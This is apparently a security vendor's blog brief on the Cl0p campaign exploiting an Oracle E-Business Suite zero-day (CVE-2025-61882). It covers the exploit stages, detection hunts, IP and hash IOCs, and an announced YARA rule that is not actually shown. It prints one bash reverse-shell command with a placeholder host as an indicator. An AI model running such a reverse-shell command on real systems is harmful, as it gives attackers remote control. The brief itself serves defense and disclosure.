Blog categories
Weekly newsletter
No spam. Just the latest releases and tips, interesting articles, and exclusive interviews in your inbox every week.
Latest from the blog
Oracle E-Business Suite Zero-Day (CVE-2025-61882) — Post-Incident Technical Brief
Posted on: 15 October 2025 | Author: Foresiet
Summary
In late 2025, a critical pre-authentication remote-code-execution vulnerability (tracked as CVE-2025-61882) in Oracle E-Business Suite (EBS) — specifically the Concurrent Processing / BI-Publisher integration — was exploited in a large-scale extortion/data-theft campaign attributed to the Cl0p/Clop extortion cluster.

Attackers abused the flaw to run attacker-controlled XSLT/Java payloads, gain remote code execution on EBS application servers, and exfiltrate sensitive data for extortion.

Oracle released emergency patches and guidance; multiple threat intelligence teams published technical writeups, IOCs, and mitigation steps.
What Exactly Happened (High Level)
- The vulnerability allowed unauthenticated HTTP requests to reach Oracle’s Concurrent Processing / BI-Publisher integration and trigger server-side handling of attacker-controlled XSLT resources. Successful exploitation enabled code execution on the app server process.
- Exploit chains combined SSRF/misrouting of template/XSLT fetches with unsafe evaluation paths in the BI-Publisher engine, enabling remote template injection and execution. Attackers used this to upload and execute scripts, create web shells or exfiltrate data.
- The campaign’s operational objective appears to have been data theft and extortion: attackers exfiltrated data to pressure victims into paying ransoms or to publish stolen files.
Technical Analysis — Deconstructing the Exploits
The exploit chains reported in vendor and vendor-analysis writeups typically follow these stages:
1. Reconnaissance & targeting
Internet-facing EBS instances (particularly versions 12.2.3 → 12.2.14) were enumerated and probed for the vulnerable BI-Publisher/Concurrent Processing endpoints. NVD confirms affected versions.
2. Pre-auth request that triggers an XSLT/template fetch
The attacker makes a crafted HTTP request that causes EBS to fetch an attacker-controlled XSLT/template via a return_url-like parameter or similar template-loading function. Because the server attempts to fetch and process external templates, the attacker controls code that will be interpreted by the template engine. Multiple vendor writeups describe the SSRF/misrouting vector and malicious XSLT fetch.
3. Template parsing → code execution
The BI-Publisher engine processes the attacker-controlled XSLT which contains constructs that evaluate system calls, Java reflection, or other engine features — resulting in arbitrary command execution in the context of the EBS application user. This is the core RCE step observed in analyses.
4. Post-exploitation: persistence, discovery, and data staging
Observed follow-on activities include: dropping web shells or scripts, creating new database templates, executing OS commands to collect credentials and data, and staging exfiltration to external storage (FTP/S3/HTTP). Detection guidance from multiple vendors stresses looking for newly created templates, suspicious process invocations, and large outbound transfers.
Detection & Hunting (practical checks)
Priority quick wins
Block external HTTP(S) access to EBS admin or BI-Publisher endpoints until patched (network/WAF). Apply Oracle emergency patches immediately; test and roll out per Oracle guidance.
Log / SIEM hunts
Webserver access logs: search for requests with unusual parameters containing return_url, remote XSLT URLs, or external hostnames in template-loading parameters. Example Splunk-style pattern (conceptual):
index=web source=ebs_access “*return_url*” OR “*.xsl” OR “.*.xml” | stats count by src_ip, uri, params
Look for HTTP requests that cause the EBS server to connect out to unfamiliar hosts (monitor egress flows and DNS resolution logs). File system & DB hunts: scan for new/modified BI-Publisher templates, unexpected DB objects or scheduled jobs created around the time of suspicious web hits. Endpoint telemetry: detect unusual Java process invocations, java -jar executions, or child processes spawned by the EBS app process account.If you suspect compromise, capture memory images of the EBS app servers and examine for injected Java classes, in-memory web shells, or command history executed by application user contexts. Google/Mandiant guidance recommends memory forensics where suspicious activity is observed
IOCs & Where to Get Them
Oracle’s emergency alert contains IOCs (IP addresses, hashes, sample commands). Vendor posts (Rapid7, CrowdStrike, Tenable) published additional hashes and detection signatures — pull these directly into your EDR/SIEM/Network devices. Start here: Oracle Security Alert for CVE-2025-61882 and Rapid7 / CrowdStrike writeups for confirmed IOCs and community analysis.
Key IOCs for CVE-2025-61882 / EBS Exploitation Campaign
IP addresses (Observed Connection Activity)
200.107.207.26
185.181.60.11
Suspicious command / shell pattern (observed used for outbound callback)
sh -c /bin/bash -i >& /dev/tcp/<host>/<port> 0>&1
(Oracle advisory shows the typical reverse-TCP spawn command — adapt detection to match variations such as different ports, use of /dev/tcp//, or use of bash -i >& /dev/tcp/….)
File hashes (Oracle advisory — SHA256)
76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d — oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip
aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 — oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py
6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b — oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py
Additional leaked exploit file hashes (MD5)
b296d3b3115762096286f225696a9bb1 — exp.py (MD5)
e278700f827590c1dff9e24116bde4da — readme.md (MD5)
23094d64721a279c0ce637584b87d6f1 — server.py (MD5)
Important: IOCs change quickly. Use vendor pages above for the authoritative and most current lists.
Example YARA rule (detecting likely exploit artifacts / suspicious XSLT payloads)
This YARA is intended to detect suspicious XSLT templates or attacker payload files discovered on disk/capture locations that include telltale strings used in observed exploit chains (e.g., return_url parameters, xsl:stylesheet plus Java reflection calls).Tune and test before deployment; YARA can generate false positives on legitimate BI-Publisher templates. Use file path/context exclusions (e.g., known good templates directory).

Scan suspect directories where received templates or uploaded files appear, or feed captured HTTP bodies from proxy logs into a YARA triage. Tune condition and add legitimate template path whitelists to reduce noise.
Closing Notes & Sources
This post summarizes currently available public intelligence and vendor advisories about CVE-2025-61882 and the associated exploitation campaign. Because the situation is active and IOCs are updated frequently, ingest the official Oracle Security Alert and vendor blogs into your threat feeds and keep your detection signatures up to date.
Conclusion
We are continuing to actively monitor threat-actor leak sources and public disclosures related to this EBS exploitation campaign, including potential future postings by extortion groups. however, because the campaign is ongoing and may result in additional data releases,
We will maintain heightened monitoring, update detections, and investigate any new indicators as they appear.
About us!
Foresiet is the pioneering force in digital security solutions, offering the first integrated Digital Risk Protection SaaS platform. With 24x7x365 dark web monitoring and proactive threat intelligence, Foresiet safeguards against data breaches and intellectual property theft. Our robust suite includes brand protection, takedown services, and supply chain assessment, enhancing your organization’s defense mechanisms. Attack surface management is a key component of our approach, ensuring comprehensive protection across all vulnerable points. Compliance is assured through adherence to ISO27001, NIST, GDPR, PCI, SOX, HIPAA, SAMA, CITC, and Third Party regulations. Additionally, our advanced antiphishing shield provides unparalleled protection against malicious emails. Trust Foresiet to empower your organization to navigate the digital landscape securely and confidently.
Latest
From the blog
The latest industry news, interviews, technologies, and resources.